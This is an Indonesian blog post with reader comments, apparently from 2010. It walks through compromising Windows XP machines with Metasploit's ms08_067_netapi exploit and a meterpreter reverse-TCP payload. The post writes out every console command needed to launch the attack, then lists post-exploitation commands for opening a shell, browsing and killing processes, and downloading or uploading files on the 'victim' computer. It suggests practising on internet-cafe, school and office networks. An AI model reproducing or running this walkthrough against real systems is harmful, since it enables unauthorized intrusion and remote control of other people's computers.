Kamis, 27 Mei 2010

4

Exploiting/Hacking Windows XP dengan Metasploit

  • Kamis, 27 Mei 2010
  • Nurkholish Ardi Firdaus
  • Share
  • Hahahaha, hari gini masih posting spt ini??? Gpp, mungkin sudah banyak orang yang mempostingkan hal ini, tapi ini 100% buatan q loooh, ;). ok langsung aja
    kali ini q mau main2 sama Metasploit, metasploit adlh exploit engine yang mempunyai segudang exploit untuk berbagai OS, dari Windus, Linux, Unix , Mac OS smuanya ada dsini. Fungsinya adlah biasanya dgunakan utk melakukan testing keamanan sebuah jaringan. Metode exploitasinya jg brmacem2, ada module yang mengexploitasi kelemahan OS (ex, WIndus: DCOM-RPC), Software (ex: Mozzila), dsb.
    Kita bisa praktekin di warnet, network sekolah, kantor dsb. Tapi jgn d slahgunain yaaaaaa...
    Aplikasinya bisa di dunlud disini
    OK, kalo udah di dunlud,ya d install kalo udah ya dibuka!!!!
    yuk qt praktekin booooooo.......
    Kalo dibuka, biasanya loadingnya lmayan lama......, nih gmbar lg loading



    Ditunggu aja,, okkkkk................


    Wah kyakya udah slesai loding nih,,, biasanya lngsung kluar terminal metasploi
    t yang brwrna-wrni, keren yah!!!!!!!!




    Modal:
    qt hrus tahu almat ip korban, ip kita


    Kali ini qt akan menggnken:


    Module : ms08_067_netapi
    Payload : meterpreter_reverse_tcp

    ya udh ketik:

    use windows/smb/ms08_067_netapi




    lalu enter
    ketik lagi


    set rhost ip_korban ,(contoh: set rhost 192.168.1.100), lalu enter

    set lhost ip_kita ,(contoh: set lhost 192.168.1.108), lalu enter


    set lport 4444 , lalu enter



    set payload windows/meterpreter/reverse_tcp



    kalo udah diketik smua printah diatas, lalu
    Untuk memulai exploit ketiklah

    exploit , lalu enter





    Nah, akhirnya kita udah bisa masuk ke sesi meterpreter (meterpreter>)
    Itu artinya komputer korban mengatakan 'SENDIKO NDAWUH NDORO, KULO MANUT KALIYAN NDORO',,, hahahaha
    atau dengan kata lain akses root kmptr korban sdh brada ditangan kita.

    Ya udah, kamu terserah mau ngapain.
    Tips:

    untuk masuk ke sesi Command Prompt ketik:

    shell

    untuk berpindah direktori kerja di kmptr krbn ketik:

    cd [Nama Folder]

    Untuk berpindah direktori kerja di kmptr kita ketik:

    lcd [Nama Folder]

    Untuk mengetahui daftar file korban di folder yang sedang kita bt kerja ketik:

    ls

    Untuk menegtahui daftar process kmptr korban ketik:

    ps

    Untuk menghentikan proccess di kmptr krban ketik:

    kill [PID Proccess]


    Dan msh bnyak lagi prntah2 lainnya spt:
    mendownload file korban
    mengupload file kita ke kmptr krbn
    dll

    Selengkapnya dpt dilihat dg mengetik:

    help


    HAPPY PENETRATING!!!!!







    Jangan Lupa Komentar Yaa..
    Related Posts Plugin for WordPress, Blogger...

    4 Komentar Untuk “Exploiting/Hacking Windows XP dengan Metasploit”

    Anonim mengatakan...

    Selasa, 08 Februari 2011 11.18.00 WIB Reply To This Comment

    [*] Started reverse handler on 192.168.73.44:4444
    [-] Exploit exception: The connection timed out (192.168.73.56:445).
    [*] Exploit completed, but no session was created.

    itu artinya apa???
    apa yang mesti dilakuin klo kaya gitu?


    Nurkholish Ardi Firdaus mengatakan...
    Selasa, 08 Februari 2011 12.13.00 WIB Reply To This Comment

    @Anonim wah, itu artinya celah kelemahan di kmpter target sudah diperbaiki gan. jadi km tdk bs mengeksploitasinya. maaf, anda blum beruntung ^_^


    Anonim mengatakan...

    Sabtu, 05 Maret 2011 02.19.00 WIB Reply To This Comment

    download nya yg metasploit framework bukan?


    Nurkholish Ardi Firdaus mengatakan...
    Sabtu, 05 Maret 2011 05.14.00 WIB Reply To This Comment

    @Anonim iya gan,,, dunlud yg metasploit framework...


    Posting Komentar

    Berikan komentar positif tentang artikel yang sederhana ini niscaya sobat akan mendapatkan balasannya. Hehehe

    Subscribe